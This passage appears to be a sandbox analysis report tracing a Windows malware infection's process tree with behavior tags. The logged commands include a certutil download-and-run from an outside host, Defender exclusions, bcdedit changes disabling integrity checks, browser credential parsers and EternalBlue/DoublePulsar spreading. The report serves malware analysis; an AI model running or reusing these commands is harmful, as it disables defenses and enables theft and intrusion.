C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w3qhzfgl.kjx\gaooo.exe & exit11⤵PID:3624
-
C:\Users\Admin\AppData\Local\Temp\w3qhzfgl.kjx\gaooo.exeC:\Users\Admin\AppData\Local\Temp\w3qhzfgl.kjx\gaooo.exe12⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3712 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
- Executes dropped EXE
PID:3828
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
- Executes dropped EXE
PID:4736
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
- Executes dropped EXE
PID:6532
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:2332
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w5xu5ofa.252\md7_7dfj.exe & exit11⤵PID:6080
-
C:\Users\Admin\AppData\Local\Temp\w5xu5ofa.252\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\w5xu5ofa.252\md7_7dfj.exe12⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:6156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rovmimzz.3h4\askinstall29.exe & exit11⤵PID:7828
-
C:\Users\Admin\AppData\Local\Temp\rovmimzz.3h4\askinstall29.exeC:\Users\Admin\AppData\Local\Temp\rovmimzz.3h4\askinstall29.exe12⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:8088 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe13⤵PID:4616
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe14⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4680
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wrveltsq.4ib\customer4.exe & exit11⤵PID:5496
-
C:\Users\Admin\AppData\Local\Temp\wrveltsq.4ib\customer4.exeC:\Users\Admin\AppData\Local\Temp\wrveltsq.4ib\customer4.exe12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:5532 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"13⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5636 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b firefox14⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8280
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b chrome14⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8336
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b edge14⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8348
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ea4qemi4.ach\GcleanerWW.exe /mixone & exit11⤵PID:6044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gttwksig.czn\privacytools5.exe & exit11⤵PID:6348
-
C:\Users\Admin\AppData\Local\Temp\gttwksig.czn\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\gttwksig.czn\privacytools5.exe12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:6388 -
C:\Users\Admin\AppData\Local\Temp\gttwksig.czn\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\gttwksig.czn\privacytools5.exe13⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6904
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4urv2vsp.sek\setup.exe /8-2222 & exit11⤵PID:7316
-
C:\Users\Admin\AppData\Local\Temp\4urv2vsp.sek\setup.exeC:\Users\Admin\AppData\Local\Temp\4urv2vsp.sek\setup.exe /8-222212⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:7360 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Frosty-Field"13⤵
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:7408
-
-
C:\Program Files (x86)\Frosty-Field\7za.exe"C:\Program Files (x86)\Frosty-Field\7za.exe" e -p154.61.71.51 winamp-plugins.7z13⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:8856
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Frosty-Field\setup.exe" -map "C:\Program Files (x86)\Frosty-Field\WinmonProcessMonitor.sys""13⤵PID:6512
-
C:\Program Files (x86)\Frosty-Field\setup.exe"C:\Program Files (x86)\Frosty-Field\setup.exe" -map "C:\Program Files (x86)\Frosty-Field\WinmonProcessMonitor.sys"14⤵
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:6560
-
-
-
C:\Program Files (x86)\Frosty-Field\7za.exe"C:\Program Files (x86)\Frosty-Field\7za.exe" e -p154.61.71.51 winamp.7z13⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:7816
-
-
C:\Program Files (x86)\Frosty-Field\setup.exe"C:\Program Files (x86)\Frosty-Field\setup.exe" /8-222213⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:8200 -
C:\Program Files (x86)\Frosty-Field\setup.exe"C:\Program Files (x86)\Frosty-Field\setup.exe" /8-222214⤵
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3476 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"15⤵PID:3924
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes16⤵
- Modifies data under HKEY_USERS
PID:2960
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-222215⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:3028 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F16⤵
- Creates scheduled task(s)
PID:4108
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F16⤵
- Creates scheduled task(s)
PID:4128
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"16⤵
- Executes dropped EXE
- Modifies system certificate store
PID:4228 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER17⤵
- Modifies boot configuration data using bcdedit
PID:6040
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:17⤵
- Modifies boot configuration data using bcdedit
PID:6128
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:17⤵
- Modifies boot configuration data using bcdedit
PID:6164
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows17⤵
- Modifies boot configuration data using bcdedit
PID:6192
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe17⤵
- Modifies boot configuration data using bcdedit
PID:6220
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe17⤵
- Modifies boot configuration data using bcdedit
PID:6256
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 017⤵
- Modifies boot configuration data using bcdedit
PID:6280
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn17⤵
- Modifies boot configuration data using bcdedit
PID:6304
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 117⤵
- Modifies boot configuration data using bcdedit
PID:6328
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}17⤵
- Modifies boot configuration data using bcdedit
PID:6380
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast17⤵
- Modifies boot configuration data using bcdedit
PID:6408
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 017⤵
- Modifies boot configuration data using bcdedit
PID:6428
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}17⤵
- Modifies boot configuration data using bcdedit
PID:6464
-
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v16⤵
- Modifies boot configuration data using bcdedit
PID:6580
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe16⤵
- Executes dropped EXE
PID:6636
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"16⤵
- Executes dropped EXE
PID:7296 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)17⤵PID:7440
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)18⤵
- Suspicious use of AdjustPrivilegeToken
PID:7388
-
-
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.8416⤵PID:8048
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.9316⤵PID:7960
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.8816⤵PID:6044
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.7916⤵PID:8736
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.8516⤵PID:8972
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.6516⤵PID:8984
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.7216⤵PID:9012
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.6816⤵PID:9064
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.9116⤵PID:2208
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.7616⤵PID:3744
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵
- Executes dropped EXE
PID:9112
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
- Executes dropped EXE
PID:9152
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Doublepulsar-1.3.1.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Doublepulsar-1.3.1.exe16⤵
- Executes dropped EXE
PID:3248
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exe16⤵
- Executes dropped EXE
PID:3256
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
- Executes dropped EXE
PID:3336
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵
- Executes dropped EXE
PID:3352
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exe16⤵
- Executes dropped EXE
PID:3516
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵
- Executes dropped EXE
PID:8840
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
- Executes dropped EXE
PID:8928
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
- Executes dropped EXE
PID:7336
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵
- Executes dropped EXE
PID:3696
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵PID:3848
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵PID:3908
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵PID:4232
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵PID:2124
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵PID:3932
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵PID:4032
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵PID:2724
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵PID:2636
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exeC:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe16⤵
- Modifies data under HKEY_USERS
PID:2812
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵PID:2900
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵PID:3000
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Doublepulsar-1.3.1.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Doublepulsar-1.3.1.exe16⤵PID:2832
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exe16⤵PID:2848
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵PID:2948
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵PID:3532
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵PID:1972
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵PID:1396
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵PID:1752
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵PID:1588
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵PID:2244
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵PID:2344
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵PID:2232
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵PID:2456
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵PID:1928
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵PID:940
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fxszsyr2.x3u\setup.exe /S /kr /site_id=754 & exit11⤵PID:7588
-
C:\Users\Admin\AppData\Local\Temp\fxszsyr2.x3u\setup.exeC:\Users\Admin\AppData\Local\Temp\fxszsyr2.x3u\setup.exe /S /kr /site_id=75412⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:7624 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"13⤵PID:7812
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&14⤵PID:7884
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3215⤵PID:7904
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6415⤵PID:7924
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZeivHZFw" /SC once /ST 10:27:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="13⤵
- Creates scheduled task(s)
PID:8448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZeivHZFw"13⤵PID:8568
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gZeivHZFw"13⤵PID:8936
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\DEUmVUN.exe\" nh /site_id 754 /S" /V1 /F13⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:9000
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\hjjgaa.exe" /Verysilent5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:2496 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:2528
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:4064
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:8856
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:2392
-
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E075E819-137F-4762-8AAE-E4810080741A} S-1-5-21-3825035466-2522850611-591511364-1000:EIDQHRRL\Admin:Interactive:[1]1⤵PID:8664
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:8752 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:3500
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:3548 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2600
-
-
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\FJYaFgdN\jCXSMNj.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\FJYaFgdN\jCXSMNj.exe U4 /S2⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
PID:7592
-
-
C:\Users\Admin\AppData\Roaming\scdvrabC:\Users\Admin\AppData\Roaming\scdvrab2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:8688 -
C:\Users\Admin\AppData\Roaming\scdvrabC:\Users\Admin\AppData\Roaming\scdvrab3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5632
-
-
-
